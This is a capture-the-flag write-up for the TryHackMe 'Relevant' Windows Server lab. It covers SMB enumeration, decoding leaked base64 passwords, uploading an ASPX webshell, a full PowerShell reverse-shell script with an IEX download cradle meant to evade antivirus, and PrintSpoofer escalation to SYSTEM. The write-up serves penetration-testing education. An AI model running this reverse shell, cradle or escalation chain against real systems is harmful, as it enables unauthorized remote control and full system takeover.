THM Machine Relevant

Here I solve The THM Machine Relevant. There I exploit PrintSpoofer Vulnerability to gain higher privileged account.

THM Relevant Logo

Pre-Engagement Briefing

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.

Scope of Work

The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:

• User.txt

• Root.txt

Additionally, the client has provided the following scope allowances:

• Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first

• Locate and note all vulnerabilities found

• Submit the flags discovered to the dashboard

• Only the IP address assigned to your machine is in scope

• Find and report ALL vulnerabilities.

Information Gathering

IP Address

export ip=10.10.111.67

Scanning

Running the nmap scan to find open ports and the result is like the following.

$ nmap -sC --min-rate 100 --max-rate 200 $ip

PORT      STATE SERVICE
80/tcp    open  http
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2022-08-18T15:08:49+00:00
| ssl-cert: Subject: commonName=Relevant
| Issuer: commonName=Relevant
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-08-17T14:37:56
| Not valid after:  2023-02-16T14:37:56
| MD5:   8705 7420 7bf9 8563 bb66 29f5 cdde fd1d
|_SHA-1: 2c85 81dc 2811 d9b2 0d70 9cf7 593b 6b12 b260 53cc
|_ssl-date: 2022-08-18T15:08:48+00:00; -2m42s from scanner time.
49663/tcp open  http
49667/tcp open  unknown

Host script results:
|_clock-skew: mean: 1h21m18s, deviation: 3h07m50s, median: -2m42s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-08-18T08:08:49-07:00
| smb2-time: 
|   date: 2022-08-18T15:08:48
|_  start_date: 2022-08-18T14:38:15
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

From the above scan result, we see the system has the following open ports and services running on it.

• Port 80 that is running an http service and possibly running a Windows IIS web server.

• Port 135 running Microsoft RPC (Remote procedural Call) service is a basic thing when the system is running smb and NetBIOS service.

• Port 139 is running the netbios service

• Port 445 is running the smb service and nmap showed it as microsoft-ds in its result.

• Port 3389 is an RDP (Remote Desktop Protocol) service that shows some useful information i.e Computer Name, Domain Name, etc.

• Port 49663 is also running an http service.

• Port 49667 service is unknown to nmap they weren't able to guess what type of service is running on it.

Besides all that they also find some other information that we can read in the scan results. Now let's move on to do some information on the running ports.

Enumeration

We saw there is an smb service running so we can start from it and see if they give us any access with a guest or anonymous account (Login without giving him any credentials). We can use the Linux command line utility smbclient to access it using the following command.

$ smbclient -L \\\\$ip\\

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	nt4wrksv        Disk      

Above we try to list all the shares that are present in the smb server and we see there is a share that is not come by default i.e nt4wrksv. The nt4wrksv share also allowed anonymous login, because I can able to connect to it using the following.

smbclient \\\\$ip\\nt4wrksv

In the share, there is a passwords.txt file that has the following content.

[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

It looks like the password was encoded with base64, So I decode it with the following command.

$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d && echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d

They give me the following output.

Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$

They are some kind of credentials so I tried it on RDP but It doesn't work. I just keep that in my notes for now and let's move into enumerating some other services.

HTTP

There is more than one http server running on the machine and they just have a default Windows IIS page.

Content-Discovery

I use ffuf to discover some hidden directories and files but didn't find any useful directory, where we can use the above credentials or do any other things.

I try the nt4wrksv share name on the web server and luckily it shows status 200. That means that directory exits and when I request for passwords.txt it shows me its content. I try to upload files from smb and I was successfully able to do that.

Knowing this we can upload any reverse shell file and execute it by visiting the page. As it's a Windows IIS server that uses aspx or asp files as its backend language so we have to use the reverse shell in that language. We can make a reverse shell using msfvenom but I use /usr/share/webshells/aspx/cmdasp.aspx and upload it using the following command.

smb: \> put /usr/share/webshells/aspx/cmdasp.aspx

After that I visit the page on this link http://$ip/nt4wrks/cmdasp.aspx, and they show me the command execution box where I can submit any command and they show me its output.

Initial Access

Now I try to get a reverse shell by uploading reverse shell binary(.exe) generated by msfvenom but AntiVirus deletes it, Also I cannot able to execute the powershell reverse shell command because the antivirus marks that malicious. So I search on Google and got the following command that downloads a text file that contains powershell reverse shell code and after downloading that they execute it without alerting antivirus software. This is a staged payload in which they execute the first payload that requests the other payload part and executes it to give us a reverse shell.

The Powershell code is the following.

function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '10.11.79.134'
// Setup PORT
$port = '4444'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

There we have to change the $address variable with the attacker machine IP and the $port variable with the port we want to use and then save it with the name powershell.reverse.txt or any filename you like and host it, I use a python http server for this.

$ python3 -m http.server 80

After hosting that Powershell file executes the following command in your command shell.

powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).downloadString('http://10.11.79.134/powershell.reverse.txt')"

This will call to your powershell.reverse.txt file, download it and then execute it, and eventually, you will receive a connection back.

Note: Start your netcat listener first before executing the above command. For Windows, I prefer using the following command to start a listener. $ rlwarp nc -lvnp 4444

Privilege Escalation

After gaining initial access to the system the next thing we try to achieve is to gain a higher privileged account or access. To do that we enumerate the system to find some misconfiguration or plain text passwords that we can use to get higher access.

We can use a tool name winpeas that automate all the basic enumeration for us and highlight some ways that can be used to get higher privileges.

I host winpeas.bat and transfer it using a Python http server, We can also upload that using smb.

certutil.exe -urlcache -split -f http://10.11.79.134/winPEAS.bat winpeas.bat

After running winpeas.bat we see our user has some permission that is used in privilege escalation.

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

There we can see SeImpersonatePrivilege is enabled and in Windows OS there is a vulnerability or a misconfiguration that is used to get privilege escalation. If a user has this permission enabled then we can use a tool name printspoofer that can be downloaded from the following link.

https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

Download that binary and host it using a Python server or some other way and then download it to the target system using the following command.

certutil.exe -urlcache -split -f http://10.11.79.134/PrintSpoofer64.exe PrintSpoofer64.exe

After that use the following command to exploit the vulnerability to get a higher privileged account.

PrintSpoofer64.exe -i -c cmd.exe

This opens a command prompt with the nt authority\system account that has all the permissions in the system. Secure both user.txt and root.txt flags and submit it.